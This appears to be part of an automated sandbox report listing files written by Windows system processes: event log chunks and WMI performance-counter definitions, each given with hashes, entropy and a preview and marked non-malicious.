                                                                                                                                                                                Preview:3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3444
                                                                                                                                                                                Entropy (8bit):5.011954215267298
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                                                                                                MD5:B133A676D139032A27DE3D9619E70091
                                                                                                                                                                                SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                                                                                                SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                                                                                                                                SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):48786
                                                                                                                                                                                Entropy (8bit):3.5854495362228453
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                                                                                                                                MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                                                                                                                                SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                                                                                                                                SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                                                                                                                                SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):79168
                                                                                                                                                                                Entropy (8bit):4.1333456683787695
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:DHdIo2S+410HdIo2S+41KdcmbkrP5tH15QaVhL0KXSvPEsghcVrbtHdIo2S+41gC:Dd2dd21c8IPL0KXSvPEs6c1td2M
                                                                                                                                                                                MD5:A540CEA1ADF6472141CBB955D03815A5
                                                                                                                                                                                SHA1:4144C1DC36987CB539F88AA16C4B99C79E582899
                                                                                                                                                                                SHA-256:A1CDEC6BDE7CEE0A664870A9777511DEA83C967A485A635DE9C4EF7726FEFFFB
                                                                                                                                                                                SHA-512:6B14374B4E536E7887BCA637F242F45CA61C2D3EFFFFA3965B019E9EE920663DFC531092836B5BE59649B6026B97F7ED9AFF29947A5C4F04380F1D1FA8CAF362
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk..................................... ........7.3....................................................................t...............................................=...................................................................................q.......................................c...............<...........................j...................M...Y...........................j...............................F.......................................................................&...............**..h............./..$.........l.1&........l.1..LP;.{EE.d.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..V............{..P.r.o.v.i.d.e.r...3....=.......K...N.a.m.e.........N.E.T. .R.u.n.t.i.m.e..A..M...w........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n........
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):3.844757629881363
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:5he6UHi2uepX7xasnPC3FzFtpFDhFPFyF842xDmSyVflkWiVytr1jSmKbC93ZmLH:5VUHiapX7xadptrDT9W84R9RNdlJEt
                                                                                                                                                                                MD5:6DD9513F9459922C47E5DA7D177B65ED
                                                                                                                                                                                SHA1:22141C6315B5E37BF885AA1B2D611BB4A7B85186
                                                                                                                                                                                SHA-256:EEE9440984A354B116F442B7E64D4754847E667C0A90A6AD38DD990371A09086
                                                                                                                                                                                SHA-512:3D40609D277197F9249A917D3890960F419CB78B47A68CE5A74A902AC069DBAB781C33A104E21C8A12B5C484EACBB00783FE8F1AC48752C24709B833AAAE5F1C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........H...............H....................u3.......................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...............................................N...........&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, show spot sensor, calibration: offset 0.000000, slope 13321401407157305344.000000
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.375898877258491
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:GhzN7UN0HN9NINoNaNxNUN7N+N8NXNINCXNGNXNNaYNXa4NvNhnNFNENNhSNEcNV:GDttjfckEwpQTB1cuat3x9
                                                                                                                                                                                MD5:C9340739814935979F6E070F71B429C3
                                                                                                                                                                                SHA1:5D5883156D59CE1BFCCE51E8B05190DACBD63C4D
                                                                                                                                                                                SHA-256:C73213B06AE8111F7F5E76AA12A63FBD173A2BF1072D07B0D1BEE6C91C722160
                                                                                                                                                                                SHA-512:23A7490C2F62515367EB614618910117A79AC4A42A0C9815C8194D47F4D8A978DB5A0D1F503BC6B07A2433DB05EB8F7582289AEDF7062C3D1B735049825CF459
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.x...............x.............................r.....................................................................].B.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F....................{..........................&.......................MX......]...................................................................**......x.......G.".U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):72488
                                                                                                                                                                                Entropy (8bit):4.2472609222321775
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:pV+VFhWV7V/uVxVBV+Vt/WWVnVyVqVmVXV5VX64VX7XjVXEVXVrVX9V6rV67UVjt:6EEIiXkrtrAVEU
                                                                                                                                                                                MD5:8DEF4D53626D1DDAAF19980B56956C89
                                                                                                                                                                                SHA1:FC50D33BEB342B7B2C67A64E5A55225753FA0D27
                                                                                                                                                                                SHA-256:B86DA8DDECB61D3BF53640F86FA3283B555A29E671EBC3CA0D0A2B0258A3E09D
                                                                                                                                                                                SHA-512:D09F17D4F37EC3C5A5F002F59E988D52F1B61116898AE62BBD548AD7E3DF6D36E5F9C6D3B590FA329B70909ECAE8BCA3074021EE369EC8C94E13BF191E445B43
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.I.......N.......I.......N...........@........Q........................................................................Ys................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**......M.......~b...$.........Z7;&...............................................................@.......X...a.!.....E..........@~b...$..g..TW....<.TW...........M....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....c.r....**......N............$.........Z

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.213049085236613
Encrypted:false
SSDEEP:384:fh+m3shOg26Qm6mt3m+DmqkTmETiImombmtmgmRmvhmCmGImchm7mBmImwmtmHm2:fNCOg26Dk1TisCzjECrXqm
MD5:C142C52B34FFDA11B1B98479A7FD083A
SHA1:46E3403362EDEE1AA85FA9304DCCF2786938FBD6
SHA-256:EE26845A028E718A3FCB180BB07B1B944DA0C876313A24EDA336A7BAF53D49C9
SHA-512:1198A7AA1C55DD65542CBEA8A567A910645D6A167B02692C5C8E33F9AB40644BE233589181B7F67263324DEB1A661BE95E964607F1C680C7EFC8EDBED5E1E2C7
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.5176441861373292
Encrypted:false
SSDEEP:96:fNVaO8sMa3Z85ZML7b2rjjc3Z85ZRp3Z85Zu3Z85Z23Z85Zu:lV7pp8nMLmvcp8nbp8nup8n2p8n
MD5:0015474DBDBCC6BC2EC6B38A8CD00FDD
SHA1:F33587C448FADDCACA28008D0A6587C2BAF093A4
SHA-256:C3579E1999F1022AE58D3EC049252308309780FBC2526570A3578E9E1F034AE8
SHA-512:31BECC029E157566D461BCAD183734ADD11A0B0595E47445179BE1DA0D2D4E62509FF4324DE08CEE2E0B6FDACD0FA7BA4B500F9A9E79665AD9A5AA70E262EB99
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.6213104887740535
Encrypted:false
SSDEEP:768:0PB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9hFUKjSxw:wXY5nVYIyyqED5BVZUe7NrVnL3K9fYS
MD5:94CE283335713D796E068233C0D27233
SHA1:8B154CE1AEB28021DFE8B3FE78D322210537769A
SHA-256:619E945769B0AFB1D3097B0FD8D85539C20F3024E47A98CAAB23DCA2F089EE2E
SHA-512:5DAFBD530019133D08737F49D10DFF926CAD9D665588F800D18B6F3321FFB1EF7C7C2D61F0AD30C1084ECD2086D90E7099A7A9E0AADD3DC8AA047B51D75879B6
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:modified
Size (bytes):91736
Entropy (8bit):2.508762603276442
Encrypted:false
SSDEEP:384:ahdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorrqorrcoiorlorKoriob:aDCoLZGKP8DCoLZGKPFFNCMkS
MD5:B18B8E51F9CC27E214AC45614D675F6F
SHA1:9030961A5EB116912518533BE5E9F65FB3B24736
SHA-256:3926F47FAADDB413A1EBBF40CFDB93243C308F6E2FBE8838D4C7390A81ED3C47
SHA-512:C846C372FD64F5D5740BFD4AA44C93E1116684A905DFA252DADCF26BEA01270595209756BA40E6D02FD9D4CC0038164DD95ABA962510E69A487CCE0A5A36B4F8
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 206.521484
Category:dropped
Size (bytes):65536
Entropy (8bit):0.8818863793721268
Encrypted:false
SSDEEP:384:PhAiPA5PNPxPEPHPhPEPmPSPRP3PoP5PUZPDPBPrPTP:P2N7
MD5:ABC20FF1642044E1CCE03170FDE15383
SHA1:8FA47598A436BFAC1C60AA663BBA85ED65684EB3
SHA-256:335CB1E45B8A1EBDC3714F6744B8AA7332FD8A88C296A4FC03F300D1417CCE8D
SHA-512:262570D8EAB15F9A890B7FFC26B6E6D6615B2659120D7595D2E14A2DB9394EF043B475F1B00239C9E59577821EEC69441C5964D8250CAA7C623FAF497735E839
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.8732041818438444
Encrypted:false
SSDEEP:384:ihZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+ly:iWXSYieD+tvgzmMvpgNNr/C
MD5:B693B4CC631594D7178A17D644604830
SHA1:010015CDCBAC9449FB75222B3ADAA84725A573E2
SHA-256:2AB6A0ED88C441E535930D7653055EFB046C8E0D20409B95E70F6203B05B770E
SHA-512:2625F3E08A6C17703CD43E2FE6FE6DC8B1096D4BCF3DE77DE75882E923AC278A0F24E21C43644A4909F21E2DF827CDF967C53ECA1D35D18BCAB453309C55546C
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):3.232683497746438
Encrypted:false
SSDEEP:384:BhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh282:BbCyhLfI49L
MD5:0038AC79F3B40741EAB0429F2E367B74
SHA1:F02E75F1BF04FA6DEF6FD702DE4EF3B3BA916EC7
SHA-256:41065F950378E660AA697888EDEE69448C17D57219E234117E499D05059E3D17
SHA-512:5A1886EECF9A8131DB07002DAC67DD4DF4714285BC5D7753CFC75547C82C6A84CB1C8D285A822AE67AC4BC0AA282996E4FFBE3A3998EF9D8EF04306BC9259CFD
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):3.4979137394202926
Encrypted:false
SSDEEP:768:+cMhFBuyKskZljdoKXjtT/r18rQXn8x3F4mLvgpaCm:HMhFBuV
MD5:C7BC0B770A63C8940C69D47312E3A7BB
SHA1:05A1BC797A71B529AA088096C32656E11C9A0F76
SHA-256:431CBAA51709B20225245452E40537464558E323615F1704BD56BED6C106D0F9
SHA-512:AF1B0950C659D991C2EBF57D99F6F2FB028D06F16CA125CBED1F14D15E20FF2BCDF77E6A6A00B66D5B891A70179AB182FDB2269BB4C5F472260059FBD7DB6C8C
Malicious:false

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.792827407520075
Encrypted:false
SSDEEP:768:nVQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaYBnUm3iKLnn4eDB7:0Ht3iKLn
MD5:152A48624B4DFD0D038B4FA3623BA7E7
SHA1:5678AC8B8E8F29A58EA8D43EF57FFF9A6FDAEC28
SHA-256:C4F9B02538E32C9F8583CACBBFA7C43453C03CEFEE70EC5DEB0194E96197BF49
SHA-512:CB23A12137680CFD7B86FE67A4551D33CC727AE1F1EB5EB981D0DB7DB77F2F9A034AE08BEF109FFF080DC98467674369E675B06D768983E4BB15C819F3D4FE8E
Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........r...............r............... ............................................................................(.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):1.8858919329531718
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:Nh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDg:NMAP1Qa5AgfQQlke9a6
                                                                                                                                                                                MD5:B66301CC0555CC995B4374B6FF0F39E5
                                                                                                                                                                                SHA1:63D7895AAD4EA9BCDAF4D3BFB2911FBC3B316613
                                                                                                                                                                                SHA-256:C056C5B1E6C58773FC9A75C46E8CC74E855A1620D21D2FF3D0AA34CEA380165C
                                                                                                                                                                                SHA-512:5A40E2618146D20A0F89943A7155FF211302643CC0D70684CF86363E303D3887625366AF85D5B538C317E70DF3DE30193CE0CE5660FF52756CEF46AFFBBA11FB
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......................................]...`..*........................................................................c..................b...........................=...........................................................................................................................f...............?...........................m...................M...F................................................U..........&........................................&..............;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.428876543896683
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:vKhrEbExnEO4+EUEtEjEXE7LpEn7AEmxEsE27jE/iCESWQHEPEX5EwE2Ex7zEuEq:SfZRLvz75hyME8
                                                                                                                                                                                MD5:3E00DDA6A4D097354A6D64995B6F5637
                                                                                                                                                                                SHA1:37446C0346A6195D226249D251E7C8B5D9BA8EE9
                                                                                                                                                                                SHA-256:47B00BC6744A8886BE9ADAFE8E7C95FF08511038E35F12C66B74643326A29582
                                                                                                                                                                                SHA-512:1F2E1ABB9AFB705BA7E3C37B8A3DDB3EC180F83F2DBBD82C0AFA95EB37633057D9C5F4F0F76610CAC954FEACB1B7D6223B689A27628B3C69E1223CA216FB4AEC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.p...............p....................... .....U.....................................................................w.%e................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F...................................E....%......&............;...)...........-..e+.......'...1..................M...........m...........%>..M.......**......p.......Elr W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):3.462764563871168
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:5hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Klc:51T4hImaVqA
                                                                                                                                                                                MD5:90C7B97351EB8C1E5D63C95F98DA7DC2
                                                                                                                                                                                SHA1:BCA659CC6F082891275AC1DE0DBCF11874239D97
                                                                                                                                                                                SHA-256:6E033AC321438132DD42CEF1729149128602226619B68BACC8509AA2C3BF7959
                                                                                                                                                                                SHA-512:E73206F70E009C1446EA7BA550901B9AF4F43CE0EBDA17DE514E3F55A65264490A24034BCEA90F88C9B0FE6FCED2CF9E970C85E969DB39C9374CF0A2F5AF8F9A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........s...............s...............P...............................................................................................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F................................................|..........&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):2.543522413880544
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:AhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfk:AzSKEqsMuy6/ij
                                                                                                                                                                                MD5:A7C99371DDFC5A4213129E4CACAFCBC1
                                                                                                                                                                                SHA1:DD3ED05CE634AA129B7F1385424AFB489F50C66A
                                                                                                                                                                                SHA-256:ED6442E39002736D07EE523A96024EB370A0E69A127E042D0EEA7C98F466831C
                                                                                                                                                                                SHA-512:E6642A332446467BF9D5DF8FF402EDF4184CA26FC50D8D224FFBDF0504E8B0E750BCC6664E9AE3F84BBC1A9E8F945F3D77B8BAF8F3A2E4FD971FD6EEC6E1E4B2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........P...............P...............8...D......................................................................./..................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................`..................=...............................................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):2.24409357808026
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:mhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zS:mmw9g3LYx
                                                                                                                                                                                MD5:3E92F94FE6AA3FDC475D1591EF7E2704
                                                                                                                                                                                SHA1:B078DB603A5949847827FFD1EA107D357C22D6F8
                                                                                                                                                                                SHA-256:FD11BA3444675A33C4263FEAFDC9DD37E8061968D02E9BB4800B7E22D123DEB9
                                                                                                                                                                                SHA-512:A5362EB798F2F827B99F074F72D5B1208BDC89A23F152C85C3C8F9200B217F9F3E415A42B59D00D0DA765992DB085A9E47F63AC273404C95C914351150A8A4E8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........9...............9............t...v...4........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E............X..........n.......#...............................................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):0.9546787598621266
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:ssgV71IUKGGk4yb27x1IMb27kdI2dIeWIbTcc2eI5Tcc:8h1IUbGk4NIsIKINIDI
                                                                                                                                                                                MD5:BA45982149D644A9243DF5BA6EB08A81
